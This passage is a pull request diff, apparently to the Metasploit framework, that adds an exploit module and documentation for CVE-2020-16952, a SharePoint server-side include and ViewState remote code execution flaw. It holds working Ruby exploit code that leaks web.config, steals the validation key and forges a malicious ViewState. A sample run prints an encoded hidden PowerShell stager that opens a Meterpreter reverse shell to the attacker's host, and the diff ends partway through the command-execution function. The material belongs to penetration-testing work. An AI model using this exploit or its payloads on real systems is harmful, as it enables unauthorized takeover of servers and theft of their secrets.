### PR TITLE
Add SharePoint Server-Side Include (SSI) and ViewState RCE (CVE-2020-16952)

### DIFF
--- a/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
@@ -1,0 +1,129 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a server-side include (SSI) in SharePoint to leak
+the `web.config` file and forge a malicious ViewState with the extracted
+validation key.
+
+This exploit is authenticated and requires a user with page creation
+privileges, which is a standard permission in SharePoint.
+
+Tested against SharePoint 2019 on Windows Server 2016.
+
+### Setup
+
+Follow [Microsoft's
+documentation](https://docs.microsoft.com/en-us/sharepoint/install/install-sharepoint-server-2016-on-one-server).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Windows command.
+
+### 1
+
+This uses a Windows dropper to execute code.
+
+### 2
+
+This uses a PowerShell stager to execute code.
+
+## Options
+
+### HttpUsername
+
+Set this to the SharePoint username.
+
+### HttpPassword
+
+Set this to the SharePoint password.
+
+## Scenarios
+
+### SharePoint 2019 on Windows Server 2016
+
+```
+msf6 > use exploit/windows/http/sharepoint_ssi_viewstate
+[*] Using configured payload windows/x64/meterpreter/reverse_https
+msf6 exploit(windows/http/sharepoint_ssi_viewstate) > options
+
+Module options (exploit/windows/http/sharepoint_ssi_viewstate):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   HttpPassword                     no        SharePoint password
+   HttpUsername                     no        SharePoint username
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /                yes       Base path
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   VALIDATION_KEY                   no        ViewState validation key
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_https):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The local listener hostname
+   LPORT     8443             yes       The local listener port
+   LURI                       no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   PowerShell Stager
+
+
+msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set rhosts 192.168.123.237
+rhosts => 192.168.123.237
+msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httpusername Administrator
+httpusername => Administrator
+msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httppassword Passw0rd!
+httppassword => Passw0rd!
+msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(windows/http/sharepoint_ssi_viewstate) > run
+
+[*] Started HTTPS reverse handler on https://192.168.123.1:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
+[*] Creating page for SSI: /sft89C0WLv1TX2GhlvzUv4fTj.aspx
+[+] Successfully created page
+[*] Leaking web.config
+[+] ViewState validation key: FEF7456DF90E1A6B7CA04D00ED56228602E2AF3C94B7A34F7735D5AFC340C9E4
+[*] Deleting /sft89C0WLv1TX2GhlvzUv4fTj.aspx
+[+] Successfully deleted page
+[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
+[*] Powershell command length: 2790
+[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIANLFfl8CA7VW/4+aSBT/uU36P5CLiZizCqvbuk2aHCgInLoiCqt75oIwwtThy8Kwyt7d/35vUNpt2t61lxzRMPN4Xz/vvXmzL2KP4iTmjusn7o9XL1/M3cyNOL4RTXptrpHt+7j14gXQG0/pjnvP8fdSmo6SyMXx9t27YZFlKKbnfWeMqJTnKNoRjHK+xf3JOSHK0Ovb3QfkUe4PrvF7Z0ySnUsubOXQ9ULEvZZin32bJJ7LfOlYKcGUb/72W7N1/1rcdpSHwiU537TKnKKo4xPSbHF/tZjBZZkivjnFXpbkyZ52HBz3rjqrOHf3aAbaHtEU0TDx82YLgoBfhmiRxRwLh8mfv/JNWM6zxJN8P0N53mxz90zz/Xb7C39/MbsoYooj1NFjirIktVD2iD2UdzQ39glaoP0WpCya4TjYtlrA9pgcEN+IC0La3I+o4WfoWIP2vUL8cyHgmtOs1YY0fhnmNPELgs6Cza/4yTLfgqfOPuD216uXr17u60oJ9qlKn9cKrF7cV2sE3vHzJMcV43tOaHNTMOTSJCth21hmBWptP2LLNT7kqXXd/rYCseYG3nxQogho93aC/S3IXDLa2BFG/XZdjtAex2hUxm6Evbr0+K+hjPYEVUF2arYZ+MQ3Lx+QP0IEBS5lwLFkfyGmRJh+lJULTHyUSR5kKgevIImtz50554Jv6vEURYDReQ/V19hDwaOa+1LkZW2d7YGpOSRunre5eQEd57U5C7kE+W1OinN8+SQVNKmWzU/uTgtCsefmtFa3bZ1RvFgbJnFOs8KDpEHkSytFHnYJA6LNadhHcmnhoLba/CoMQ5cQaAPQ9AhpAAoL36KsFDJw8Jz2VsdCVI9SgiJgqjpfJW4AfX6p9qp43AD5zc8drIv5XLkMiBqBZ+5Bdi2S0DZn44zC8cFArSroP5p/dnSAI8MMXfLA1/1xL5eUFXWjrIr0AkoFQUYhfDVLItnN0Zv++Yzgf+oqeHQ9HyVPEjyKujBt2VrZG33qG8TSqbVW8GQVhjoW9WC51AxL+rlnHVId9wzTGmlSNjqFe0nPdUWTS1OUJU/Db22j4seCPjBtVZd8OQrugvXwqM/DOx0MDSeBHsBb1kNPFjZCIAuKNTGHsgG8JhaCdV/c6N0BkfGTpVuS5lS2wZ7pacbIPYEdpd/X7k5LaTY1pFC99VXxSg0VLEgHy9TMzWE8GSnV3mN7c50rWFHXoMs07RA5dio7irox7VQPfj4Gpj3p9tVQBrqOT5PU6sIjioADXVq7657rXKe7yBYAI8fS49Dy9sOl5kVyt2uvxJmOkbp0DsLpqAin0p6BTPLGjqOYwSrNu/Ybqc9Wp9ulXkyX6/7kg1JOy/5JUsGepxqnwegtQ4bFCfoeJHFmQBsa8WBdqeje3CXIZNANBMe+ma7vfG2m+uOVQvHybiHuVMNYaWFvJoT6SvWpH9HHWWw8rp2NMbHDPRrrfR+LxNM2e69nCysxndyOwkc3ulkuIlFzxgvVXimieZVc22Ka7sanuQ1ubRzvaXF1jd0DKZ0oDWdCer10SOJZooYUQdxopFgqx555CPHsShWcQGbxABbquopFwH1p9GsSVlHIJsQGsU4y2+q/7d7YwLt5GJIbHe/VB01MLVeXoBRlAyP5QYb8WLtUXKRvxjWOoFMC3xn/bOoR9l+uhFg7YmE81h674vpO8hc3+mkw1pWjJIG8MhjdBbW8Ne/OfWmSPRShzUgrkTyYampgX5P7oQy+QRtIldw6Vefko5wxAzvYuIb/YIWNqwPYlKSg8nVPjCL81cFIv+TK1oOBGbDaziN3IkN9H/vgl2+sj2L4IKmEYXCkruF0b1bvf2K9Dc3dKG7k0/PG/dbEnbpZHroEGhpmaX2CqkmmXsbjPMFMgufZheqAshgRuJDAlaU+iCQCGWSz+TxH4WJwHtfs9rCCZe/qq6sW95Gx9Wlq16R37zbgJRxtZdSZoDigYVs49QQBBrBw6gsQ5PfHNUzSkgdFbTa+z7icFZNKcYsddg26KQf/K1qXEzaEl/+vaH2i/cPX70JQaF8i/oL+OeGHEP3R2B0XU2C0YEoQdL6ifAOCS208u8axxEDu95eH3cJvC/p6Bre7Vy//BgM3qOruCwAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[+] Successfully executed command
+[*] https://192.168.123.1:8443 handling request from 192.168.123.237; (UUID: yiuulv4t) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.237:62895) at 2020-10-08 02:55:12 -0500
+
+meterpreter > getuid
+Server username: GIBSON\Administrator
+meterpreter > sysinfo
+Computer        : WIN-G2PGASM3QFA
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : GIBSON
+Logged On Users : 18
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
@@ -9,6 +9,10 @@ validation key.
 This exploit is authenticated and requires a user with page creation
 privileges, which is a standard permission in SharePoint.
 
+The `web.config` file will be stored in loot once retrieved, and the
+`VALIDATION_KEY` option can be set to short-circuit the SSI and trigger
+the ViewState deserialization.
+
 Tested against SharePoint 2019 on Windows Server 2016.
 
 ### Setup
@@ -43,6 +47,10 @@ Set this to the SharePoint username.
 ### HttpPassword
 
 Set this to the SharePoint password.
+
+### VALIDATION_KEY
+
+Set this to the ViewState validation key if you have it.
 
 ## Scenarios
 
@@ -102,18 +110,19 @@ msf6 exploit(windows/http/sharepoint_ssi_viewstate) > run
 [*] Started HTTPS reverse handler on https://192.168.123.1:8443
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
-[*] Creating page for SSI: /sft89C0WLv1TX2GhlvzUv4fTj.aspx
+[*] Creating page for SSI: /z0zL8ruBOIcdq7aVekdlh.aspx
 [+] Successfully created page
 [*] Leaking web.config
+[+] /Users/wvu/.msf4/loot/20201015131428_default_192.168.123.237_web.config_940022.txt
 [+] ViewState validation key: FEF7456DF90E1A6B7CA04D00ED56228602E2AF3C94B7A34F7735D5AFC340C9E4
-[*] Deleting /sft89C0WLv1TX2GhlvzUv4fTj.aspx
+[*] Deleting /z0zL8ruBOIcdq7aVekdlh.aspx
 [+] Successfully deleted page
 [*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
-[*] Powershell command length: 2790
-[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[*] Powershell command length: 2918
+[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
 [+] Successfully executed command
-[*] https://192.168.123.1:8443 handling request from 192.168.123.237; (UUID: yiuulv4t) Staging x64 payload (201308 bytes) ...
-[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.237:62895) at 2020-10-08 02:55:12 -0500
+[*] https://192.168.123.1:8443 handling request from 192.168.123.237; (UUID: 8g4qnmlb) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.237:62885) at 2020-10-15 13:15:00 -0500
 
 meterpreter > getuid
 Server username: GIBSON\Administrator

--- a/lib/msf/core/exploit/viewstate.rb
+++ b/lib/msf/core/exploit/viewstate.rb
@@ -67,7 +67,7 @@ module Exploit::ViewState
 
     unless Rex::Text.encode_base64(viewstate) == encoded_viewstate
       vprint_error('Could not decode ViewState')
-      return {data: nil, hmac: nil}
+      return { data: nil, hmac: nil }
     end
 
     hmac_len = generate_viewstate_hmac('', algo: algo).length
@@ -81,7 +81,7 @@ module Exploit::ViewState
       vprint_error('Could not parse ViewState HMAC')
     end
 
-    {data: data, hmac: hmac}
+    { data: data, hmac: hmac }
   end
 
   def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
@@ -105,6 +105,31 @@ module Exploit::ViewState
 
     # Do we have what it takes?
     our_hmac == their_hmac
+  end
+
+  # Extract __VIEWSTATE from HTML
+  def extract_viewstate(html)
+    html.at('//input[@id = "__VIEWSTATE"]/@value')&.text
+  end
+
+  # Extract __VIEWSTATEGENERATOR from HTML
+  def extract_viewstate_generator(html)
+    html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text
+  end
+
+  # Extract validationKey from web.config
+  def extract_viewstate_validation_key(web_config)
+    web_config.at('//machineKey/@validationKey')&.text
+  end
+
+  # Convenience method to convert __VIEWSTATEGENERATOR to binary
+  def pack_viewstate_generator(hex_generator)
+    [hex_generator.to_i(16)].pack('V')
+  end
+
+  # Convenience method to convert validationKey to binary
+  def pack_viewstate_validation_key(hex_key)
+    [hex_key].pack('H*')
   end
 
 end

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -1,0 +1,302 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::ViewState
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE',
+        'Description' => %q{
+          This module exploits a server-side include (SSI) in SharePoint to leak
+          the web.config file and forge a malicious ViewState with the extracted
+          validation key.
+
+          This exploit is authenticated and requires a user with page creation
+          privileges, which is a standard permission in SharePoint.
+
+          Tested against SharePoint 2019 on Windows Server 2016.
+        },
+        'Author' => [
+          'mr_me', # Discovery and exploit
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-16952'],
+          ['URL', 'https://srcincite.io/advisories/src-2020-0022/'],
+          ['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'],
+          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952']
+        ],
+        'DisclosureDate' => '2020-10-13', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command',
+            'Arch' => ARCH_CMD,
+            'Type' => :win_cmd,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+            }
+          ],
+          [
+            'Windows Dropper',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :win_dropper,
+            'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
+              'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
+            }
+          ],
+          [
+            'PowerShell Stager',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :psh_stager,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'DotNetGadgetChain' => :TypeConfuseDelegate
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
+      # "Promote" these advanced options so we don't have to pass around our own
+      OptString.new('HttpUsername', [false, 'SharePoint username']),
+      OptString.new('HttpPassword', [false, 'SharePoint password'])
+    ])
+  end
+
+  def post_auth?
+    true
+  end
+
+  def username
+    datastore['HttpUsername']
+  end
+
+  def password
+    datastore['HttpPassword']
+  end
+
+  def vuln_builds
+    [
+      [Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013
+      [Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016
+      [Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019
+    ]
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # Hat tip @tsellers-r7
+    #
+    # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
+    unless (build_header = res.headers['MicrosoftSharePointTeamServices'])
+      return CheckCode::Unknown('Target does not appear to be running SharePoint.')
+    end
+
+    unless (build = build_header.scan(/^([\d.]+):/).flatten.first)
+      return CheckCode::Detected('Target did not respond with SharePoint build.')
+    end
+
+    if vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) }
+      return CheckCode::Appears("SharePoint #{build} is a vulnerable build.")
+    end
+
+    CheckCode::Safe("SharePoint #{build} is not a vulnerable build.")
+  end
+
+  def exploit
+    unless username && password
+      fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation')
+    end
+
+    if (@validation_key = datastore['VALIDATION_KEY'])
+      print_status("Using ViewState validation key #{@validation_key}")
+    else
+      create_ssi_page
+      leak_web_config
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :win_cmd
+      execute_command(payload.encoded)
+    when :win_dropper
+      execute_cmdstager
+    when :psh_stager
+      execute_command(cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      ))
+    end
+  end
+
+  def create_ssi_page
+    print_status("Creating page for SSI: #{ssi_path}")
+
+    res = send_request_cgi(
+      'method' => 'PUT',
+      'uri' => ssi_path,
+      'data' => ssi_page
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+    end
+
+    unless [200, 201].include?(res.code)
+      if res.code == 401
+        fail_with(Failure::NoAccess, "Failed to auth with creds #{username}:#{password}")
+      end
+
+      fail_with(Failure::NotFound, 'Failed to create page')
+    end
+
+    print_good('Successfully created page')
+    @page_created = true
+  end
+
+  def leak_web_config
+    print_status('Leaking web.config')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => ssi_path,
+      'headers' => {
+        ssi_header => '<form runat="server" /><!--#include virtual="/web.config"-->'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+    end
+
+    unless res.code == 200
+      fail_with(Failure::NotFound, "Failed to retrieve #{ssi_path}")
+    end
+
+    unless (@validation_key = extract_viewstate_validation_key(res.get_xml_document))
+      fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')
+    end
+
+    print_good("ViewState validation key: #{@validation_key}")
+  ensure
+    delete_ssi_page if @page_created
+  end
+
+  def delete_ssi_page
+    print_status("Deleting #{ssi_path}")
+
+    res = send_request_cgi(
+      'method' => 'DELETE',
+      'uri' => ssi_path,
+      'partial' => true
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+    end
+
+    unless res.code == 204
+      print_warning('Failed to delete page')
+      return
+    end
+
+    print_good('Successfully deleted page')
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
+      'vars_post' => {
+        '__VIEWSTATE' => generate_viewstate_payload(
+          cmd,
+          extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
+          algo: 'sha256',
+          key: pack_viewstate_validation_key(@validation_key)
+        )
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+    end
+
+    unless res.code == 200
